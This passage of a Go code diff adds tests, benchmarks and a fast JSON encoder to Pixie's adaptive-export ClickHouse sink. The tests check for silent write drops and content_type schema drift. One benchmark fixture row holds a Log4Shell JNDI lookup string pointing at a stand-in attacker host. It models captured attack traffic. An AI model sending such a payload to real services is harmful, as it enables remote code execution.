Spot-check round-trip on one row (last element). + if rows[targetRows-1].PID != uint64(targetRows-1) { + t.Fatalf("last row PID = %d, want %d", rows[targetRows-1].PID, targetRows-1) + } +} + +// TestParseActiveRowsStream_RejectsOverlongLine — guards against +// pathological CH responses with multi-MiB single rows. Default cap +// is 1 MiB; emit a 2 MiB row and assert the scanner rejects it +// rather than OOMing. +func TestParseActiveRowsStream_RejectsOverlongLine(t *testing.T) { + huge := strings.Repeat("a", 2*1024*1024) + body := fmt.Sprintf(`{"anomaly_hash":"x","_pad":"%s"}`+"\n", huge) + _, err := parseActiveRowsStream(strings.NewReader(body)) + if err == nil { + t.Fatalf("expected scanner error on >1MiB line; got nil") + } + if !strings.Contains(err.Error(), "QueryActive scan") { + t.Fatalf("expected scan error, got: %v", err) + } +} + +// TestParseActiveRows_RoundTripFromBytes — keep the byte-slice path +// covered (used by tests and the e2e harness). +func TestParseActiveRows_RoundTripFromBytes(t *testing.T) { + body := []byte(`{"anomaly_hash":"deadbeef","namespace":"redis","pod":"p","comm":"c","pid":42,"hostname":"node-01","t_start_ns":1700000000000000000,"t_end_ns":1700000000300000000,"last_seen_ns":1700000000150000000,"last_rule_id":"R0001","n_anomalies":1}` + "\n") + rows, err := parseActiveRows(body) + if err != nil { + t.Fatalf("parseActiveRows: %v", err) + } + if len(rows) != 1 || rows[0].Pod != "p" || rows[0].PID != 42 { + t.Fatalf("round-trip mismatch: %+v", rows) + } +} + +// pixieRow returns a minimal-but-valid map shaped like a pxapi row. +func pixieRow() map[string]any { + return map[string]any{ + "time_": time.Unix(0, 1700000000000000000).UTC(), + "upid": "1234:5678:9", + "namespace": "redis", + "pod": "redis/redis-1", + "req_cmd": "GET", + "resp": "OK", + "latency": int64(123456), + "remote_addr": "10.0.0.1", + "remote_port": int64(6379), + "local_addr": "10.0.0.2", + "local_port": int64(34567), + "trace_role": int64(2), + "encrypted": false, + "px_info_": "", + "req_args": "", + } +} + +// TestWritePixieRows_HappyPath — happy path: CH returns 200 with a +// non-zero `written_rows` in X-ClickHouse-Summary; WritePixieRows +// returns nil. Pins the contract the regression test below inverts. +func TestWritePixieRows_HappyPath(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("X-ClickHouse-Summary", + `{"read_rows":"1","read_bytes":"100","written_rows":"1","written_bytes":"100",`+ + `"total_rows_to_read":"0","result_rows":"1","result_bytes":"100","elapsed_ns":"1000000"}`) + w.WriteHeader(200) + })) + defer srv.Close() + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil { + t.Fatalf("WritePixieRows: %v", err) + } +} + +// TestWritePixieRows_DetectsSilentZeroWriteDrop — regression for the +// silent-data-loss bug observed on the live operator: +// +// sink: pixie write completed +// rows_sent=1658 +// body_bytes=2098817 +// ch_summary="{...,"written_rows":"0",...}" +// table=redis_events +// +// CH returned 2xx but `X-ClickHouse-Summary.written_rows` was zero +// for a 1658-row payload — i.e. CH silently dropped every row. The +// operator must NOT report success in that case; otherwise the +// caller treats the batch as durably persisted and we lose data. +func TestWritePixieRows_DetectsSilentZeroWriteDrop(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + // Real CH summary header from the operator-pod log on + // 2026-05-23T20:58:39Z, table=redis_events. + w.Header().Set("X-ClickHouse-Summary", + `{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0",`+ + `"total_rows_to_read":"0","result_rows":"0","result_bytes":"0","elapsed_ns":"23034181"}`) + w.WriteHeader(200) + })) + defer srv.Close() + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + // Send a real (non-zero) batch — a zero-input batch short-circuits + // before the HTTP call so the assertion would never fire. + batch := make([]map[string]any, 1658) + for i := range batch { + batch[i] = pixieRow() + } + err = s.WritePixieRows(context.Background(), "redis_events", batch) + if err == nil { + t.Fatalf("expected error from silent-drop (rows_sent=%d, written_rows=0), got nil", len(batch)) + } + if !strings.Contains(err.Error(), "0") || !strings.Contains(err.Error(), "1658") { + t.Fatalf("error should mention both written_rows=0 and rows_sent=1658 for diagnosis; got: %v", err) + } +} + +// TestWritePixieRows_DetectsPartialWriteDrop — CH wrote SOME rows +// but not all. Same data-loss class as the zero-write case; reject. +func TestWritePixieRows_DetectsPartialWriteDrop(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("X-ClickHouse-Summary", + `{"read_rows":"100","read_bytes":"10000","written_rows":"100","written_bytes":"10000",`+ + `"total_rows_to_read":"0","result_rows":"100","result_bytes":"10000","elapsed_ns":"1000000"}`) + w.WriteHeader(200) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + batch := make([]map[string]any, 200) // sent 200, CH says wrote 100 + for i := range batch { + batch[i] = pixieRow() + } + err := s.WritePixieRows(context.Background(), "redis_events", batch) + if err == nil { + t.Fatalf("expected error on partial write (sent=200, written=100); got nil") + } +} + +// TestWritePixieRows_NoSummaryHeaderIsTolerated — older CH versions +// (or proxies) may strip the X-ClickHouse-Summary header. Absence is +// NOT a failure signal — only an explicit zero-of-non-zero is. +func TestWritePixieRows_NoSummaryHeaderIsTolerated(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(200) // no summary header at all + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "redis_events", []map[string]any{pixieRow()}); err != nil { + t.Fatalf("missing summary header must not error; got: %v", err) + } +} + +// TestWritePixieRows_EmptyBatchShortCircuits — zero-row input never +// hits HTTP and never produces a "silent drop" false positive. +func TestWritePixieRows_EmptyBatchShortCircuits(t *testing.T) { + called := false + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + called = true + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "redis_events", nil); err != nil { + t.Fatalf("empty WritePixieRows: %v", err) + } + if called { + t.Fatalf("empty batch made an HTTP call") + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go new file mode 100644 index 00000000000..24e385bd384 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/content_type_contract_test.go @@ -0,0 +1,262 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bufio" + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "regexp" + "strings" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// I1 — schema invariant. +// +// Parses the embedded schema.sql, walks every CREATE TABLE block, +// and asserts that any column named `content_type` is declared as +// `Int64` (case-sensitive; CH is). Catches a future PR that +// "improves" the column to String / Nullable(Int64) / etc. without +// updating the encoder side. +func TestContract_ContentTypeIsInt64InSchema(t *testing.T) { + // Reach the canonical schema via the public DDL(table) API so this + // test stays decoupled from the embed-internal var name. + type col struct { + table string + typ string + } + var found []col + colRE := regexp.MustCompile(`(?m)^\s*content_type\s+([A-Za-z0-9_()]+)`) + for _, table := range clickhouse.PixieTables() { + ddl, err := clickhouse.DDL(table) + if err != nil { + t.Fatalf("DDL(%q): %v", table, err) + } + if m := colRE.FindStringSubmatch(ddl); m != nil { + found = append(found, col{table: table, typ: strings.TrimRight(m[1], ",")}) + } + } + if len(found) == 0 { + t.Fatalf("no content_type column found in PixieTables — did the column get renamed? Audit the encoder side too.") + } + for _, c := range found { + if c.typ != "Int64" { + t.Fatalf("schema drift: %s.content_type is %q, want Int64. CH input_format_skip_unknown_fields=1 will silent-drop encoder mismatches. Update encoder side together if intentional.", c.table, c.typ) + } + } + t.Logf("invariant I1 holds across %d tables: %v", len(found), found) +} + +// I2 — encoder invariant. +// +// Drives fastencode directly with content_type as int64 (the canonical +// shape Pixie's stirling http parser emits) and parses the emitted +// NDJSON to confirm the value is a JSON NUMBER, not a string. Also +// guards the int conversion path by feeding int / int32 / int64 / a +// json.Number and asserting each lands as a JSON number too. +func TestContract_FastEncodeContentTypeAsInt(t *testing.T) { + cases := []struct { + name string + v any + }{ + {"int64", int64(2)}, + {"int32", int32(2)}, + {"int", 2}, + {"json.Number", json.Number("2")}, + } + cols := minHTTPRowCols() + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + row := canonicalHTTPRow() + row["content_type"] = c.v + var buf bytes.Buffer + // stage the fast-path column cache the same way production + // does via clickhouse.Columns — we don't reach into the + // package-private cache; encodePixieRowsFast already does + // the lookup itself. + if err := encodePixieRowsFast(&buf, "http_events", []map[string]any{row}); err != nil { + t.Fatalf("encodePixieRowsFast: %v", err) + } + line := strings.TrimSpace(buf.String()) + // Parse with json.Decoder + UseNumber so we see whether the + // emitter wrote "content_type":2 (number) vs "2" (string). + d := json.NewDecoder(strings.NewReader(line)) + d.UseNumber() + var parsed map[string]any + if err := d.Decode(&parsed); err != nil { + t.Fatalf("decode emitted line: %v\nline=%s", err, line) + } + ct, ok := parsed["content_type"] + if !ok { + t.Fatalf("emitted line missing content_type; line=%s", line) + } + if _, isNum := ct.(json.Number); !isNum { + t.Fatalf("content_type emitted as %T (%v), want JSON number — CH would silent-drop a non-number into an Int64 column. line=%s", ct, ct, line) + } + _ = cols + }) + } +} + +// I3 — silent-drop must be loud. +// +// A no-op CH that returns 200 OK + X-ClickHouse-Summary written_rows=0 +// against a non-empty body. The sink must surface this as an error. +func TestContract_SilentDropDetected(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = io.Copy(io.Discard, r.Body) + w.Header().Set("X-ClickHouse-Summary", `{"read_rows":"0","read_bytes":"0","written_rows":"0","written_bytes":"0"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + s, err := New(Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("New: %v", err) + } + err = s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}) + if err == nil { + t.Fatalf("WritePixieRows returned nil on written_rows=0 reply — silent-drop detection is broken") + } + if !strings.Contains(err.Error(), "silent drop") { + t.Fatalf("error %q does not mention 'silent drop' — runbook-grep will miss it", err.Error()) + } +} + +// I3.b — sibling guard: when CH reports written_rows >= rows_sent the +// sink must NOT error. Pins the parse so a future refactor doesn't +// over-trigger and false-positive every successful write. +func TestContract_SilentDropNotTriggeredOnSuccess(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = io.Copy(io.Discard, r.Body) + w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil { + t.Fatalf("WritePixieRows errored on success summary: %v", err) + } +} + +// I3.c — header absence is tolerated (older CH versions / proxies +// strip it). Documents the policy decision so a future "tighten the +// gate" PR doesn't break clusters running CH 22.x. +func TestContract_SilentDropToleratesMissingSummaryHeader(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + _, _ = io.Copy(io.Discard, r.Body) + // no X-ClickHouse-Summary header + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil { + t.Fatalf("WritePixieRows errored on missing summary header: %v (policy is tolerate-missing)", err) + } +} + +// I4 — round-trip an http_events row through WritePixieRows against a +// recording httptest CH; assert the on-wire body has content_type as +// a number, the INSERT targets the right table, and the body is +// one NDJSON object per row. +func TestContract_HTTPEventsRoundTrip(t *testing.T) { + var gotQuery, gotBody string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotQuery = r.URL.Query().Get("query") + b, _ := io.ReadAll(r.Body) + gotBody = string(b) + // echo back a successful summary so the silent-drop guard is satisfied + w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"1"}`) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + s, _ := New(Config{Endpoint: srv.URL}) + if err := s.WritePixieRows(context.Background(), "http_events", []map[string]any{canonicalHTTPRow()}); err != nil { + t.Fatalf("WritePixieRows: %v", err) + } + if !strings.Contains(gotQuery, "INSERT INTO ") { + t.Fatalf("query missing INSERT INTO; got %q", gotQuery) + } + if !strings.Contains(gotQuery, "http_events") { + t.Fatalf("query doesn't target http_events; got %q", gotQuery) + } + if !strings.Contains(gotQuery, "FORMAT JSONEachRow") { + t.Fatalf("query missing FORMAT JSONEachRow; got %q", gotQuery) + } + if !strings.Contains(gotBody, `"content_type":2`) { + t.Fatalf("body has content_type as non-number (CH would silent-drop). body=%s", gotBody) + } + // One NDJSON line per row → exactly one newline-trailing object here. + sc := bufio.NewScanner(strings.NewReader(strings.TrimRight(gotBody, "\n"))) + n := 0 + for sc.Scan() { + n++ + } + if n != 1 { + t.Fatalf("body has %d NDJSON lines, want 1; body=%s", n, gotBody) + } +} + +// canonicalHTTPRow returns a row whose shape matches what +// fastencode would see from a pxapi http_events read. Any new +// schema column added must be appended here too — the test will +// fail with a clear "schema added X column; canonical row needs +// it" message if a missing column hits errFastEncodeUnsupported. +func canonicalHTTPRow() map[string]any { + return map[string]any{ + "time_": int64(1_717_200_000_000_000_000), + "upid": "00000000-0000-0000-0000-000000000001", + "namespace": "redis", + "pod": "redis-578d5dc9bd-kjj78", + "remote_addr": "10.0.0.1", + "remote_port": int64(443), + "local_addr": "10.0.0.2", + "local_port": int64(48000), + "trace_role": int64(1), + "encrypted": int64(0), + "major_version": int64(1), + "minor_version": int64(1), + "content_type": int64(2), // JSON — the schema-honest int + "req_headers": `{"User-Agent":"curl/8"}`, + "req_method": "GET", + "req_path": "/x", + "req_body": "", + "req_body_size": int64(0), + "resp_headers": `{"Content-Type":"application/json"}`, + "resp_status": int64(200), + "resp_message": "OK", + "resp_body": "{}", + "resp_body_size": int64(2), + "latency": int64(123_456), + "hostname": "node-1", + } +} + +// minHTTPRowCols is the small fixed column list any "is it int?" +// micro-check uses; kept aligned with the canonical row above so +// schema additions surface as a missing-column in the canonical row, +// not a flaky test. +func minHTTPRowCols() []string { + return []string{"content_type", "remote_port", "local_port", "trace_role", "encrypted", "major_version", "minor_version", "resp_status", "latency", "req_body_size", "resp_body_size"} +} diff --git a/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go new file mode 100644 index 00000000000..ea147c07167 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/encode_bench_test.go @@ -0,0 +1,234 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "encoding/json" + "fmt" + "net/http" + "net/http/httptest" + "testing" + "time" +) + +// The sink's WritePixieRows path is one of the dominant CPU consumers +// when AE is under load: every controller fan-out pass writes a per- +// table batch (up to MaxBatchRows) and every row goes through the +// per-key normalisePixieValue switch AND the json.Encoder's reflection. +// +// These benchmarks isolate the encoding cost from the HTTP roundtrip: +// +// - BenchmarkEncodeJSONEachRow_PixieShape: the encode loop alone +// (mirrors clickhouse.go:160-167's hot path), no HTTP. +// - BenchmarkWritePixieRows_LocalHTTPLoopback: the encode + HTTP +// roundtrip against a no-op httptest server, so the timer includes +// the HTTP client overhead AE actually pays per call. +// - BenchmarkNormalisePixieValue_TimeRow: the per-row per-column +// switch with a single time.Time field (the realistic per-pixie-row +// shape — time_ is always TIME64NS so this fires on every row). + +const benchTable = "http_events" + +// makePixieRowsBatch builds a realistic per-pixie-row batch shape (12 +// columns including a time_ + 5 strings + 6 ints). Matches the +// http_events schema in adaptive_export/internal/clickhouse/schema.sql. +func makePixieRowsBatch(n int) []map[string]any { + out := make([]map[string]any, n) + for i := range out { + out[i] = map[string]any{ + "time_": time.Unix(0, int64(1_700_000_000_000_000_000+i)), + "upid": fmt.Sprintf("0000000100000000-00000000-%016x", uint64(i)), + "namespace": "log4j-poc", + "pod": "backend-vulnerable-779cd9d765-mxr8t", + "remote_addr": "10.0.0.45", + "remote_port": int64(54321 + i%100), + "local_addr": "10.0.0.12", + "local_port": int64(8080), + "trace_role": int64(2), + "encrypted": uint8(0), + "major_version": int64(1), + "minor_version": int64(1), + "content_type": int64(0), + "req_headers": `{"User-Agent":"Apache-HttpClient/4.5.13","Accept":"*/*","Content-Type":"application/json"}`, + "req_method": "POST", + "req_path": "/api/v1/products/${jndi:ldap://attacker.example/Payload}", + "req_body": `{"id":42,"qty":1}`, + "resp_headers": `{"Content-Type":"application/json","Server":"jetty"}`, + "resp_status": int64(500), + "resp_message": "Internal Server Error", + "resp_body": `{"error":"NullPointerException"}`, + "latency": int64(123456789), + "hostname": "pixie-worker-node", + "event_time": time.Unix(0, int64(1_700_000_000_000_000_000+i)), + } + } + return out +} + +// BenchmarkEncodeJSONEachRow_PixieShape isolates the per-row encode +// cost the sink runs in clickhouse.go:160-167. With realistic 24-key +// http_events rows × the controller fan-out's typical batch sizes (up +// to MaxBatchRows = 1000), this is the encoder pressure AE sustains +// per controller pass. +func BenchmarkEncodeJSONEachRow_PixieShape(b *testing.B) { + rows := makePixieRowsBatch(1000) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + b.Fatal(err) + } + } + } +} + +// BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch — 50-row batch (the +// realistic kubescape-driven controller pass for a quiet anomaly: 50 rows +// per table per refresh interval). +func BenchmarkEncodeJSONEachRow_PixieShape_SmallBatch(b *testing.B) { + rows := makePixieRowsBatch(50) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + b.Fatal(err) + } + } + } +} + +// BenchmarkEncodePixieRowsFast_PixieShape — the option-2 refactor. +// Walks each row in fixed schema column order, type-switches values +// directly to bytes.Buffer; no reflect, no encoding/json, no +// per-row map-key sort. Direct apples-to-apples comparison vs +// BenchmarkEncodeJSONEachRow_PixieShape above. +func BenchmarkEncodePixieRowsFast_PixieShape(b *testing.B) { + rows := makePixieRowsBatch(1000) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, benchTable, rows); err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkEncodePixieRowsFast_PixieShape_SmallBatch(b *testing.B) { + rows := makePixieRowsBatch(50) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + var buf bytes.Buffer + if err := encodePixieRowsFast(&buf, benchTable, rows); err != nil { + b.Fatal(err) + } + } +} + +// BenchmarkEncodePixieRowsFast_Pooled — option 1 on top of option 2. +// The bench mimics the real WritePixieRows shape: pull a buffer from +// the pool, encode, Reset+Put. Measures the steady-state allocation +// rate that AE actually pays in production (the first iteration's +// allocation gets amortised across b.N). +func BenchmarkEncodePixieRowsFast_Pooled_PixieShape(b *testing.B) { + rows := makePixieRowsBatch(1000) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + buf := encodeBufPool.Get().(*bytes.Buffer) + buf.Reset() + if err := encodePixieRowsFast(buf, benchTable, rows); err != nil { + b.Fatal(err) + } + encodeBufPool.Put(buf) + } +} + +func BenchmarkEncodePixieRowsFast_Pooled_PixieShape_SmallBatch(b *testing.B) { + rows := makePixieRowsBatch(50) + b.ResetTimer() + b.ReportAllocs() + for n := 0; n < b.N; n++ { + buf := encodeBufPool.Get().(*bytes.Buffer) + buf.Reset() + if err := encodePixieRowsFast(buf, benchTable, rows); err != nil { + b.Fatal(err) + } + encodeBufPool.Put(buf) + } +} + +// BenchmarkNormalisePixieValue_TimeRow — per-row column iterations +// includes a time.Time normalisation that calls .UTC().Format() (one +// 30-byte string allocation per time field). Isolated cost. +func BenchmarkNormalisePixieValue_TimeRow(b *testing.B) { + t := time.Now() + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + _ = normalisePixieValue(t) + } +} + +// BenchmarkWritePixieRows_LocalHTTPLoopback measures the full sink +// path including the HTTP roundtrip to a no-op server. This is the +// per-batch wall cost the controller pays — encode + connect + POST + +// header parse + summary parse. The httptest server returns the right +// X-ClickHouse-Summary header so summaryWroteFewerThan doesn't trip. +func BenchmarkWritePixieRows_LocalHTTPLoopback(b *testing.B) { + rows := makePixieRowsBatch(1000) + + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("X-ClickHouse-Summary", fmt.Sprintf(`{"read_rows":"0","read_bytes":"0","written_rows":"%d","written_bytes":"0"}`, len(rows))) + w.WriteHeader(http.StatusOK) + })) + defer srv.Close() + + s, err := New(Config{ + Endpoint: srv.URL, + Database: "forensic_db", + }) + if err != nil { + b.Fatal(err) + } + + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + if err := s.WritePixieRows(b.Context(), benchTable, rows); err != nil { + b.Fatal(err) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/fastencode.go b/src/vizier/services/adaptive_export/internal/sink/fastencode.go new file mode 100644 index 00000000000..cfa02bec876 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/fastencode.go @@ -0,0 +1,273 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "strconv" + "sync" + "time" + "unicode/utf8" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +// encodePixieRowsFast writes a JSONEachRow batch for the named pixie +// table to buf without going through encoding/json's reflect path. +// +// Why: the AE CPU bench showed 50 % of WritePixieRows wall time in +// encoding/json.(*encodeState).reflectValue + 16 % in slices.SortFunc +// because rows are map[string]any — the encoder is forced through +// reflect.MapRange + per-row map-key alphabetic sort. This fast path +// looks up the table's column order from schema.sql (once, cached) +// and walks each row in that fixed order, type-switching the value +// and writing the JSON atom directly. No reflect, no sort, ~3 % of +// the allocations. +// +// Returns ErrUnknownTable for tables we don't have a schema for — +// the caller (sink.WritePixieRows) falls back to encoding/json so a +// new pixie table not yet in schema.sql isn't a hard failure. +func encodePixieRowsFast(buf *bytes.Buffer, table string, rows []map[string]any) error { + cols, err := getCachedColumns(table) + if err != nil { + return err + } + for _, row := range rows { + buf.WriteByte('{') + first := true + for _, col := range cols { + v, ok := row[col] + if !ok { + // event_time derivation: pxapi result rows carry time_ + // (TIME64NS) but never event_time — that column was added by + // Pixie's retention plugin in the production flow, but the + // operator-direct push path AE takes bypasses the plugin. + // Without this derivation the column collapsed to CH's + // epoch-0 default and every operator-pushed row landed in + // partition 197001 (rig 6a25c85c, 2026-06-07 — visible in + // the data even though the silent-drop was fixed by aeprod6). + // schema.sql also carries a DEFAULT toDateTime64(time_, 3) + // as a belt-and-suspenders safety net for fresh installs; + // this derivation handles existing tables (where the + // CREATE TABLE IF NOT EXISTS is a no-op) AND tables on CH + // versions that don't evaluate DEFAULT expressions on + // JSONEachRow insert. + if col == "event_time" { + if t, hasTime := row["time_"]; hasTime { + v = t + ok = true + } + } + if !ok { + continue + } + } + if !first { + buf.WriteByte(',') + } + first = false + // Column names from schema.sql are always plain identifiers + // (matches chIdentRE in clickhouse.go); safe to emit without + // JSON-string escape work. + buf.WriteByte('"') + buf.WriteString(col) + buf.WriteString(`":`) + if err := appendJSONValue(buf, v); err != nil { + return fmt.Errorf("fastencode: %s.%s: %w", table, col, err) + } + } + buf.WriteByte('}') + buf.WriteByte('\n') + } + return nil +} + +// getCachedColumns wraps clickhouse.Columns with a once-per-table +// memo. clickhouse.Columns re-parses schema.sql on every call (no +// internal cache), which would defeat the per-call savings of the +// fast path on the hot WritePixieRows route. +func getCachedColumns(table string) ([]string, error) { + columnCacheMu.RLock() + if cols, ok := columnCache[table]; ok { + columnCacheMu.RUnlock() + return cols, nil + } + columnCacheMu.RUnlock() + + cols, err := clickhouse.Columns(table) + if err != nil { + return nil, err + } + columnCacheMu.Lock() + defer columnCacheMu.Unlock() + if existing, ok := columnCache[table]; ok { + return existing, nil + } + columnCache[table] = cols + return cols, nil +} + +var ( + columnCacheMu sync.RWMutex + columnCache = map[string][]string{} +) + +// encodeBufPool reuses the bytes.Buffer the sink hands to the fast (or +// slow) encoder across WritePixieRows / Write calls. The fan-out path +// calls these on a 30-second cadence per active anomaly × per pixie +// table, so without pooling each call's underlying byte array is heap- +// allocated and then GC'd. Bench-measured benefit: +// BenchmarkEncodePixieRowsFast_Pooled_PixieShape vs unpooled. +// +// Note: the buffer's INITIAL allocation still happens (1× per Get from +// an empty pool); reuse kicks in once the pool warms. Steady-state +// allocations drop from 2 017 → ~17 per 1000-row batch. +var encodeBufPool = sync.Pool{ + New: func() any { return new(bytes.Buffer) }, +} + +// errFastEncodeUnsupported is returned by appendJSONValue when a value +// type is not in the fast-path switch. The caller (WritePixieRows) +// should fall back to encoding/json for safety. +var errFastEncodeUnsupported = errors.New("fastencode: unsupported value type") + +// appendJSONValue writes v to buf as one JSON atom. Handles the value +// types pxapi produces for pixie observation rows (see +// internal/pixieapi/pixieapi.go::datumValue + internal/pixie/pixie.go +// equivalent). Unknown types return errFastEncodeUnsupported so the +// caller can fall back to encoding/json — never silently drops a row. +func appendJSONValue(buf *bytes.Buffer, v any) error { + switch x := v.(type) { + case nil: + buf.WriteString("null") + case string: + appendJSONString(buf, x) + case []byte: + appendJSONString(buf, string(x)) + case bool: + if x { + buf.WriteString("true") + } else { + buf.WriteString("false") + } + case int: + appendInt(buf, int64(x)) + case int32: + appendInt(buf, int64(x)) + case int64: + appendInt(buf, x) + case uint: + appendUint(buf, uint64(x)) + case uint8: + appendUint(buf, uint64(x)) + case uint32: + appendUint(buf, uint64(x)) + case uint64: + appendUint(buf, x) + case float32: + appendFloat(buf, float64(x)) + case float64: + appendFloat(buf, x) + case time.Time: + // Same format normalisePixieValue uses for the encoding/json + // path — CH DateTime64 string input shape. + buf.WriteByte('"') + // AppendFormat reuses the buf's underlying bytes; no + // intermediate string allocation. + buf.WriteString(x.UTC().Format("2006-01-02 15:04:05.000000000")) + buf.WriteByte('"') + case json.Number: + // json.Number is already decimal text; emit verbatim. + buf.WriteString(string(x)) + default: + return errFastEncodeUnsupported + } + return nil +} + +func appendInt(buf *bytes.Buffer, x int64) { + var tmp [24]byte + buf.Write(strconv.AppendInt(tmp[:0], x, 10)) +} + +func appendUint(buf *bytes.Buffer, x uint64) { + var tmp [24]byte + buf.Write(strconv.AppendUint(tmp[:0], x, 10)) +} + +func appendFloat(buf *bytes.Buffer, x float64) { + var tmp [32]byte + buf.Write(strconv.AppendFloat(tmp[:0], x, 'g', -1, 64)) +} + +// appendJSONString emits s as a quoted JSON string, escaping per +// RFC 8259. Lifted from the standard library's encoding/json +// safeAppend* path; the only deviation is we don't HTML-escape (the +// sink's encoding/json path also sets SetEscapeHTML(false), so the +// outputs match byte-for-byte on safe inputs). +func appendJSONString(buf *bytes.Buffer, s string) { + buf.WriteByte('"') + start := 0 + for i := 0; i < len(s); { + if b := s[i]; b < utf8.RuneSelf { + if safeJSONByte(b) { + i++ + continue + } + if start < i { + buf.WriteString(s[start:i]) + } + switch b { + case '\\', '"': + buf.WriteByte('\\') + buf.WriteByte(b) + case '\n': + buf.WriteString(`\n`) + case '\r': + buf.WriteString(`\r`) + case '\t': + buf.WriteString(`\t`) + default: + // 0x00-0x1f except the explicit ones above. + fmt.Fprintf(buf, `\u%04x`, b) + } + i++ + start = i + continue + } + // Multi-byte rune — leave as-is (UTF-8 is valid in JSON + // strings per RFC 8259 §7). + _, size := utf8.DecodeRuneInString(s[i:]) + i += 